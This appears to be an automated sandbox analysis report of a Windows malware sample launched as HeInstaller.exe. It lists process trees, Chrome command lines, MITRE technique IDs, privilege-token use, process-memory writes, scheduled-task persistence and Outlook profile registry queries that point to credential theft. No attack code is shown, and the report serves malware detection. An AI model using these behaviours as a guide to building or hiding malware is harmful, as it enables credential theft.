Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
Key created	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000_Classes\Local Settings	OpenWith.exe

Runs ping.exe 1 TTPs 6 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEPING.EXE

pid process

6372 PING.EXE
9680 PING.EXE
4312 PING.EXE
4036 PING.EXE
7052 PING.EXE
5648 PING.EXE

pid	process
6372	PING.EXE
9680	PING.EXE
4312	PING.EXE
4036	PING.EXE
7052	PING.EXE
5648	PING.EXE

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	1245	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1392	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	1451	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	611	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	689	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	829	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exepowershell.exetz9517.exeCrack.exebrg.exemsedge.exepowershell.exevbc.exefb94349c162808651fb84b58e6881eb0.exeWerFault.exe

pid	process
3796	chrome.exe
3796	chrome.exe
2688	chrome.exe
2688	chrome.exe
224	powershell.exe
224	powershell.exe
4348	tz9517.exe
4348	tz9517.exe
4348	tz9517.exe
2112	Crack.exe
2112	Crack.exe
2112	Crack.exe
3852	brg.exe
3852	brg.exe
3852	brg.exe
3852	brg.exe
3852	brg.exe
3852	brg.exe
4804	msedge.exe
4804	msedge.exe
4804	msedge.exe
1404	powershell.exe
1404	powershell.exe
1404	powershell.exe
3404	vbc.exe
3404	vbc.exe
3420	fb94349c162808651fb84b58e6881eb0.exe
3420	fb94349c162808651fb84b58e6881eb0.exe
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
3160
4104	WerFault.exe
4104	WerFault.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

WerFault.exe

pid process

3160
776 WerFault.exe
Suspicious behavior: MapViewOfSection 3 IoCs

Processes:

fb94349c162808651fb84b58e6881eb0.exeuciugwjuciugwj

pid process

3420 fb94349c162808651fb84b58e6881eb0.exe
8120 uciugwj
6488 uciugwj

pid	process
3160
776	WerFault.exe

pid	process
3420	fb94349c162808651fb84b58e6881eb0.exe
8120	uciugwj
6488	uciugwj

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 47 IoCs

Processes:

chrome.exemsedge.exe

pid	process
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe

description	pid	process
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe
Token: SeShutdownPrivilege	3796	chrome.exe
Token: SeCreatePagefilePrivilege	3796	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exemsedge.exe

pid	process
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3160
3160
2108	msedge.exe
2108	msedge.exe
3160
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exemsedge.exe

pid	process
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
3796	chrome.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
2108	msedge.exe
3160
3160
3160
3160
3160
3160
3160
3160

Suspicious use of SetWindowsHookEx 64 IoCs

Processes:

HeInstaller.exeOpenWith.exeCredentialUIBroker.exeCredentialUIBroker.exeCredentialUIBroker.exeCredentialUIBroker.exeCrack.exeCrack.exefile.exesetup.exeWerFault.exeCrack.exeCrack.exeRegSvcs.exeWerFault.exeaspnet_wp.exeCrack.exechrome.exeConhost.exefile.exefile.exefile.exefile.exeis-I05L8.tmpis-SC6PG.tmpis-VHBPS.tmpfile.exefile.exeis-S657C.tmpfile.exefile.exefile.exefile.exe

pid	process
728	HeInstaller.exe
728	HeInstaller.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
2464	OpenWith.exe
464	CredentialUIBroker.exe
5100	CredentialUIBroker.exe
3872	CredentialUIBroker.exe
4768	CredentialUIBroker.exe
2928	Crack.exe
2928	Crack.exe
1208	Crack.exe
1208	Crack.exe
2420	file.exe
464	setup.exe
776	WerFault.exe
3160
3160
3160
3160
2388	Crack.exe
2388	Crack.exe
2112	Crack.exe
2112	Crack.exe
3160
3160
3160
3160
3160
3824	RegSvcs.exe
4876	WerFault.exe
4876	WerFault.exe
1384	aspnet_wp.exe
4356	Crack.exe
4356	Crack.exe
3160
3160
7356	chrome.exe
6008	Conhost.exe
6292	file.exe
2064	file.exe
8128	file.exe
4244	file.exe
4688	is-I05L8.tmp
6492	is-SC6PG.tmp
7096	is-VHBPS.tmp
5480	file.exe
2624	file.exe
6104	is-S657C.tmp
6100	file.exe
1788	file.exe
6256	file.exe
1368	file.exe
3160

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3796 wrote to memory of 2072	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2072	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 2244	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 5040	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 5040	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe
PID 3796 wrote to memory of 796	3796	chrome.exe	chrome.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

Processes:

brg.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe

outlook_win_path 1 IoCs

Processes:

brg.exe

description	ioc	process
Key queried	\REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	brg.exe

C:\Users\Admin\AppData\Local\Temp\HeInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\HeInstaller.exe"
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:728

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2556

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New folder\HeInstaller\txt.txt
1⤵
PID:908

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffda4bc9758,0x7ffda4bc9768,0x7ffda4bc9778
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1776 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:2
  2⤵
  PID:2244
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2220 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3196 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3332 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:2236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4572 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4596 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:4828
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4708 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4704 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:2168
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4944 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:2480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5256 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:1164
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5364 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:3888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3316 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3408 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:1280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=3288 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:1996
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4828 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=2812 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4844 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=1140 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:1384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5060 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:1368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5552 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:4600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5060 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=5676 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5632 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:4280
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5764 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:8
  2⤵
  PID:620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5836 --field-trial-handle=1816,i,15117478250836677868,13200945006767630123,131072 /prefetch:1
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
